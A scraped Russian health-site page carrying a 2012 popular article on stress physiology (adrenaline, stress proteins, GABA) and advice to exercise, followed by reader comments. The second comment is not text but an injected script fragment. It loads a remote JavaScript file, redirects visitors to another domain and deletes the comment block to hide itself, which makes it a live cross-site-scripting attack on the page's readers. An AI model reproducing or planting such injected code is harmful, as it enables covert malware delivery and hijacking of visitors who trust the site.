Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Плохой хороший стресс  >>  Плохой хороший стресс
 
Обратная связь
 

Плохой хороший стресс

Размер шрифта
31 мая 2012 08:00
  • google_analytics: false
  • Нравится

Не надо бояться стрессов. Просто надо знать, как себя при стрессах вести.

1 

Стресс – это воздействие, впервые предъявленное организму. Что при нем происходит с человеком? При стрессе:

  • учащается частота сердечных сокращений;
  • расширяются сосуды сердца;
  • расширяются сосуды мозга.

Симпатическая система – та часть нервной системы, которая управляет выбросом адреналина. Именно адреналин готовит к активным действиям: расширяет артерии, учащает сердцебиения, возбуждает кору полушарий головного мозга и обостряет все органы чувств. Причем, в желудочно-кишечном тракте, напротив, возникает спазм сосудов. Все ресурсы организма направлены на мозг, сердце и мышцы.

Таким образом организм готовится к активным действиям в опасной ситуации. Такая(симпато-адреналовая) реакция появилась у человека в ходе эволюции как приспособительная реакция на опасность. Ведь в доисторическом прошлом образ жизни человека был чрезвычайно активным. И любой стресс завершался активными действиями. Спасительные действия заключались либо в бегстве, либо – в нападении. Активные мышечные действия – это всегда большие затраты энергии. Чем больше энергии потреблял человек, тем активнее мог двигаться. Так, доисторический человек пребывал в гормонально-энергетическом балансе.

В современном мире ситуация изменилась. Гормональная реакция организма осталась прежней: сосуды расширяются, сердце «скачет», мозг активен, в кровь выбрасывается глюкоза. Но современный человек пассивен, он остается неподвижен. Поэтому глюкоза, которая должна была потратиться мускулатурой, трансформируется в жир.

Защитные механизмы

Стресс – одна из самых великих адаптивных реакций организма, возникшая для выживания. Стресс активирует не только основные системы органов, но и внутриклеточные процессы.
 

  1. Первая антистрессовая система – выработка особых белков. Такие белки сперва назывались белками теплового шока, сейчас – стресс-белками. Они являются своеобразными «санитарами»: утилизируют разрушенные белки и восстанавливают поврежденные.

  2. Вторая антистрессовая система – выработка тормозных медиаторов. Задача этих медиаторов – приведение нервной системы в спокойное состояние после стресса. Главным медиатором является гамма-аминомасляная кислота (ГАМК). Сегодня эта кислота выпускается в виде таблеток, которыми лечат не только стресс, но и нарушения работы сердца, и даже судорожный синдром.

Таким образом, стресс – это своеобразная «закалка» организма, необходимая организму. Стресс помогает вырабатывать систему «внутренних защитников»: стресс-белков и тормозных медиаторов. И человек, переживший стресс, лучше ориентируется в критических ситуациях.

Как вести себя при стрессе

В хроническом стрессе аппетит человека повышен из-за повышенной выработки гормона кортизола. Поэтому, чтобы глюкоза крови не складировалась в виде жировых отложений, необходимо эту энергию израсходовать. Активная физическая деятельность в этом случае производит несколько эффектов:
 

  1. Предупреждение накопления жира

  2. Понижение выработки гормона кортизола

  3. Повышение выработки эндорфинов («гормонов радости»)

Хотите победить стресс – двигайтесь. Физкультура даст не только спасение от лишних килограммов, но и быстрое успокоение и расслабление.

Важно!

  •  Пассивная реакция на стресс приводит к ожирению.
  •  Для снятия стресса необходимо заниматься физкультурой.



Сюжеты по теме:

Плохой хороший стресс

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

14 марта 2012 в 03:31

Цитировать   |   Пожаловаться

Я думаю, тут все индивидуално. У кого-то стресс вызывает ожирение, а у кого-то наоборот - истощение. Из физических упражнений лучше всего при борьбе со стрессом использовать йогу.

2 - zzzzzz

30 июня 2015 в 23:40

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что с вами делает злость?   Как определить тип недержания мочи?   Болезни-близнецы. Депрессия и гипотиреоз   Как мы реагируем на стресс  
23 октября 2012Мама может спасти своего ребенка от стресса 21 февраля 2012Стресс против ожирения
 
25 ноября 2011Сон облегчает переживания 09 ноября 2011Угарный газ успокаивает жителей городов
 

Слайдшоу

1
Вся правда о депрессии
7 признаков, что ваш иммунитет сдает!
Почему у вас болит голова? Самые неожиданные причины

Тесты

Есть ли у вас анемия?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.